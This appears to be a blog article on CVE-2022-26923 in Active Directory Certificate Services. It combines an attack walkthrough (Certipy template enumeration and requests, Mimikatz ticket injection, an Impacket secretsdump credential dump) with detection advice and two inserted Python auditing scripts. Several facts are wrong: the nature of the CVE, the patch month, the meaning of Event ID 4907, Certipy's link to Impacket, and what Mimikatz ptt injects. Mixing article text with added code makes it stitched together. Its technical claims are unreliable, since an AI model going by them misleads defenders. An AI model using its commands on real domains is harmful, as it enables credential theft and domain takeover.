CVE‑2022‑26923: Abusing AD Certificate Services for Domain‑Admin Impersonation
A deep‑dive into CVE‑2022‑26923—an Active Directory Certificate Services (ADCS) vulnerability that allows low‑privileged users to request and abuse privileged certificate templates. Learn how the exploit works step by step, see real‑world attack chains, and discover practical detection and mitigation strategies to safeguard your domain.
Table of Contents
- Introduction
- What Is AD Certificate Services (ADCS)?
- How CVE‑2022‑26923 Works
- Accessing the Web Enrollment Interface
- Identifying Privileged Templates
- Crafting a Malicious Certificate Request
- Certificate Issuance Without Proper Checks
- Using the Privileged Certificate for Kerberos Impersonation
- Detailed Exploitation Walkthrough
- Prerequisites
- Enumerating Available Templates
- Crafting and Submitting the Malicious Request
- Certificate Injection via Mimikatz/Impacket
- Detection Strategies
- Monitoring Certificate Request Events (Event ID 4907)
- Reviewing Certificate Template Permissions
- Auditing CA Logs for Suspicious Activity
- Mitigation Best Practices
- Applying the March 2022 Windows Security Update
- Restricting Template Permissions to Authorized Users
- Disabling Web Enrollment When Unnecessary
- Continuous Auditing and Alerting
- Conclusion
- References and Further Reading
1. "CVE-2022-26923": Abusing Certificate Services in AD
CVE-2022-26923 targets the Active Directory Certificate Services (ADCS), specifically the Web Enrollment interface. ADCS is responsible for managing and issuing certificates within an Active Directory environment, and it’s commonly used to issue certificates for authentication and encryption purposes.
This vulnerability occurs when certificate templates are misconfigured or insecurely configured, allowing a low-privileged user to request a certificate for a privileged template (e.g., Domain Admin). With this certificate, the attacker can escalate their privileges and impersonate a Domain Admin or other high-privileged accounts within the domain.
2. How CVE-2022-26923 Works
Active Directory Certificate Services (ADCS)
ADCS is part of the PKI infrastructure in Windows environments, and it provides services for issuing, managing, and revoking certificates. The Web Enrollment feature allows users to request certificates via a web interface (certsrv). Typically, an authorized user would request a certificate for things like user authentication or email encryption.
When certificate templates are misconfigured, even non-administrative users may be able to request certificates for privileged templates. These templates could allow users to impersonate Domain Admins, giving attackers a way to escalate their privileges.
Steps of the Exploit:
- Accessing Web Enrollment:
  - The attacker accesses the Web Enrollment interface of the ADCS server via http://<CA-Server>/certsrv.
  - By default, this interface should require authentication, but the attacker is able to access it due to improper configurations or weak access control policies.
- Identifying Privileged Templates:
  - The attacker identifies available certificate templates using the Web Enrollment page. They specifically look for Domain Admin certificates or any templates that might allow the impersonation of high-privileged accounts.
- Crafting a Malicious Request:
  - Using tools such as PowerShell or Impacket, the attacker crafts a malicious certificate request. The request will be for a template that could allow a Domain Admin to be impersonated.
- Certificate Issuance:
  - In a misconfigured ADCS environment, the Certificate Authority (CA) will issue the certificate without proper checks, even though the attacker is not authorized for that template.
- Using the Privileged Certificate:
  - The attacker then uses tools like Mimikatz or Impacket to impersonate a Domain Admin with the issued certificate. The attacker can now authenticate as a Domain Admin, gaining full control of the domain.
3. Exploitation Process in Detail
Here’s a step-by-step breakdown of the exploitation:
Step 1: Prerequisites
- Access to the Web Enrollment page (http://<CA-Server>/certsrv).
- Low-privileged user account.
- Misconfigured certificate templates allowing unauthorized access.
Step 2: Enumerating Available Templates
The attacker first needs to find the certificate templates that are available for request. The Web Enrollment page may allow them to do this by simply visiting the page.
Commands:
```powershell
# Using PowerShell to list certificate templates available to the user
Get-Certificate -Template
```
This command will list all the available certificate templates. The attacker will look for high-privileged templates, such as those associated with Domain Admins.
Alternatively, attackers can enumerate the templates using tools like Impacket.
```bash
# Using Impacket to query for certificate templates
python3 certipy.py enum -u <user> -p <password> -d <domain> -dc-ip <dc-ip>
```
Step 3: Crafting the Malicious Certificate Request
Once the attacker identifies a privileged template (e.g., for Domain Admin certificates), they need to create a request for it.
- Using PowerShell: The attacker can use PowerShell to create a malicious request.
```powershell
$certRequest = New-Object -ComObject X509Enrollment.CX509CertificateRequestPkcs10
$certRequest.InitializeFromTemplate(1, "DomainAdminTemplate")
$certRequest.Encode()
$certRequest.Submit()
```
**Using Certipy (Impacket)**:
Impacket’s **certipy** can also be used to craft and submit requests for certificates.
```bash
# Requesting a certificate for a domain controller template
python3 certipy.py req -u <user> -p <password> -t <template> -domain <domain> -dc-ip <dc-ip>
```
In this example, the attacker specifies the template that could be used to request a Domain Admin certificate.
Step 4: Certificate Issuance
The CA issues the certificate because the request did not properly validate the attacker’s privileges.
- The issued certificate can now be used for authentication.
Step 5: Using the Privileged Certificate
Once the attacker has the privileged certificate, they can use tools like Mimikatz to inject the certificate into Kerberos authentication and impersonate a Domain Admin.
Using Mimikatz to Inject the Certificate:
```
mimikatz.exe "kerberos::ptt <cert-file>"
```
This command injects the certificate into the Kerberos ticket cache, allowing the attacker to authenticate as a Domain Admin.
Alternatively, the attacker can use Impacket's secretsdump.py or kerberos.py to perform further actions.
```bash
# Using Impacket to dump domain secrets after impersonation
python3 impacket-secretsdump.py <domain>/<username>:<password> -just-dc
```
4. Detection and Mitigation
Detection
Monitoring Certificate Requests:
- Event ID 4907 logs certificate requests. Admins should monitor for unauthorized certificate requests, especially for high-privileged templates.
Example Event ID for a certificate request:
```
Event ID 4907: A certificate request has been submitted.
```
Certificate Template Permissions:
- Ensure that permissions on certificate templates are restricted to authorized users only.
- Review the Web Enrollment logs and configure proper access controls to prevent unauthorized access.
Check CA Logs:
- Review the Certificate Authority logs to detect suspicious certificate issuance requests or patterns.
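The detection advice above (monitor certificate request events and flag requests for high-privileged templates from accounts that should not be enrolling in them) can be turned into a small, testable check. The following script is an added example, not code from the original article: it assumes CA request events have already been exported to one-line text records with the fields shown in `SAMPLE_LOG`, and the template and account names, the allow-list and the sample lines are all constructed placeholders. The event ID used in the sample is the one this article associates with certificate requests.

```python
"""Flag certificate requests for privileged templates that come from
requesters outside an allow-list (added detection example).

Assumptions, not from the article: events are exported as one line per
record with EventID / RequestID / Requester / Template fields; template
and account names below are placeholders."""
import re
from dataclasses import dataclass

# Templates treated as privileged (assumed names for this example).
PRIVILEGED_TEMPLATES = {"DomainAdminTemplate", "DomainController", "Administrator"}
# Principals expected to enrol in those templates (assumed for this example).
AUTHORISED_REQUESTERS = {"CORP\\svc-pki", "CORP\\DC01$", "CORP\\pki-admin"}

EVENT_RE = re.compile(
    r"EventID=(?P<event_id>\d+)\s+RequestID=(?P<request_id>\d+)\s+"
    r"Requester=(?P<requester>\S+)\s+Template=(?P<template>\S+)"
)


@dataclass(frozen=True)
class CertRequest:
    event_id: int
    request_id: int
    requester: str
    template: str


def parse_event(line: str):
    """Return a CertRequest for a request-event line, or None for other lines."""
    m = EVENT_RE.search(line)
    if m is None:
        return None
    return CertRequest(
        int(m.group("event_id")),
        int(m.group("request_id")),
        m.group("requester"),
        m.group("template"),
    )


def is_suspicious(req: CertRequest) -> bool:
    """Suspicious = privileged template requested by a non-allow-listed account.
    Requests for ordinary templates (e.g. User) are never flagged here."""
    return req.template in PRIVILEGED_TEMPLATES and req.requester not in AUTHORISED_REQUESTERS


def find_suspicious(lines):
    """Run the check over exported event lines; returns the offending requests."""
    hits = []
    for line in lines:
        req = parse_event(line)
        if req is not None and is_suspicious(req):
            hits.append(req)
    return hits


# Constructed sample export; these lines are not real CA output. The event ID
# 4907 is the one the article associates with certificate requests.
SAMPLE_LOG = [
    "2022-05-11T09:14:02 EventID=4907 RequestID=1041 Requester=CORP\\jdoe Template=User",
    "2022-05-11T09:15:37 EventID=4907 RequestID=1042 Requester=CORP\\DC01$ Template=DomainController",
    "2022-05-11T09:16:55 EventID=4907 RequestID=1043 Requester=CORP\\jdoe Template=DomainAdminTemplate",
    "2022-05-11T09:17:10 EventID=4907 RequestID=1044 Requester=CORP\\bsmith Template=DomainController",
    "2022-05-11T09:18:00 EventID=4624 Logon type=3 Account=CORP\\jdoe",  # unrelated event
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"ALERT request {hit.request_id}: {hit.requester} requested {hit.template}")
```

Run against the sample, the script flags requests 1043 and 1044 and ignores the legitimate domain controller renewal and the unrelated logon event. In practice the allow-list would be derived from the template's actual enrollment ACL rather than hard-coded, and the parser adapted to the export format in use (SIEM JSON, `certutil -view` output, or Windows event XML).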
Mitigation
- Patch the Vulnerability:
- Apply the March 2022 Windows Security Update to patch CVE-2022-26923.
- Restrict Certificate Template Permissions:
- Only allow administrators to request privileged certificates. Limit permissions on sensitive templates such as Domain Admin or Domain Controller certificates.
- Disable Web Enrollment if not Needed:
- If the Web Enrollment feature is not necessary, disable it entirely to prevent attackers from exploiting it.
- Audit and Monitor:
- Set up continuous auditing of certificate templates and CA logs to detect unusual or unauthorized activity.
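The "restrict certificate template permissions" and "audit and monitor" items above amount to a periodic review of each template's enrollment ACL together with the template settings that make a certificate usable for logon. The script below is an added example, not code from the original article, and it generalises slightly beyond the text: it reports a template when a low-privileged principal holds the Enroll right, the template carries the Client Authentication EKU, and the requester is allowed to supply the subject name, and it notes whether CA manager approval is required. The export format is constructed for the example; in a real review the values would be read from the template objects in the Configuration partition (for instance via `certutil -v -template` or an LDAP query). The GUID and flag constants are the documented AD/ADCS values.

```python
"""Audit exported certificate-template settings for sensitive templates that
low-privileged principals can enrol in (added example).

Assumptions, not from the article: the dictionary export format below is
constructed; template names are placeholders."""

# Certificate-Enrollment extended right (controlAccessRight GUID).
CERT_ENROLL_RIGHT = "0e10c968-78fb-11d2-90d4-00c04f79dc55"
# msPKI-Certificate-Name-Flag bit: the requester may supply the subject name.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
# Client Authentication EKU: certificates with it can be used for logon.
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"

# Principals that effectively mean "any domain account" (assumed list).
LOW_PRIV_PRINCIPALS = {"Everyone", "Authenticated Users", "Domain Users", "Domain Computers"}


def broad_enrollers(template):
    """Low-privileged principals holding an Allow ACE for the Enroll right."""
    return sorted(
        ace["principal"]
        for ace in template["aces"]
        if ace["type"] == "Allow"
        and ace["right"] == CERT_ENROLL_RIGHT
        and ace["principal"] in LOW_PRIV_PRINCIPALS
    )


def audit_template(template):
    """Return finding strings for one template; an empty list means no issue."""
    who = broad_enrollers(template)
    if not who:
        return []  # only privileged groups can enrol: out of scope here
    if CLIENT_AUTH_EKU not in template["ekus"]:
        return []  # certificate cannot be used to log on
    if not template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []  # subject is built from the requester's own AD object
    findings = [
        f"Enroll granted to {', '.join(who)} on a logon-capable template "
        "whose subject the requester supplies"
    ]
    if template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("mitigated in part: requests are held for CA manager approval")
    else:
        findings.append("issued automatically without manager approval")
    return findings


def audit_all(templates):
    """Map template name -> findings for every template that has any."""
    report = {}
    for t in templates:
        findings = audit_template(t)
        if findings:
            report[t["name"]] = findings
    return report


# Constructed sample export (placeholder template names, not a real export).
SAMPLE_TEMPLATES = [
    {   # the kind of misconfiguration the article describes
        "name": "DomainAdminTemplate",
        "ekus": [CLIENT_AUTH_EKU],
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": 0,
        "aces": [
            {"type": "Allow", "principal": "Domain Users", "right": CERT_ENROLL_RIGHT},
            {"type": "Allow", "principal": "Domain Admins", "right": CERT_ENROLL_RIGHT},
        ],
    },
    {   # broadly enrollable, but subject comes from AD: not reported
        "name": "User",
        "ekus": [CLIENT_AUTH_EKU],
        "name_flag": 0,
        "enrollment_flag": 0,
        "aces": [{"type": "Allow", "principal": "Domain Users", "right": CERT_ENROLL_RIGHT}],
    },
    {   # enrol right limited to Domain Controllers: not reported
        "name": "DomainController",
        "ekus": [CLIENT_AUTH_EKU],
        "name_flag": 0,
        "enrollment_flag": 0,
        "aces": [{"type": "Allow", "principal": "Domain Controllers", "right": CERT_ENROLL_RIGHT}],
    },
    {   # same weakness, but requests are pended for manager approval
        "name": "ApprovedAdminCert",
        "ekus": [CLIENT_AUTH_EKU],
        "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS,
        "aces": [{"type": "Allow", "principal": "Authenticated Users", "right": CERT_ENROLL_RIGHT}],
    },
]

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_TEMPLATES).items():
        print(name)
        for f in findings:
            print("  -", f)
```

On the sample data only `DomainAdminTemplate` and `ApprovedAdminCert` are reported; the stock `User` template is left alone because the subject is built from the requester's AD object, and `DomainController` because no low-privileged principal can enrol. Scheduling this check and diffing its output over time gives the continuous template auditing the mitigation list calls for.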
5. Conclusion
CVE-2022-26923 is a serious vulnerability that allows an attacker to escalate their privileges in an Active Directory environment by exploiting misconfigured certificate templates in ADCS. Once the attacker gets hold of a privileged certificate, they can impersonate Domain Admins and take full control of the domain.
Mitigation strategies include patching the system, reviewing and restricting certificate template permissions, and disabling unnecessary features like Web Enrollment. Continuous monitoring and auditing are also critical to detect any signs of misuse or exploitation.
6. References and Further Reading
- Microsoft Security Advisory: CVE-2022-26923
- Impacket GitHub Repository: Impacket
- Mimikatz GitHub Repository: Mimikatz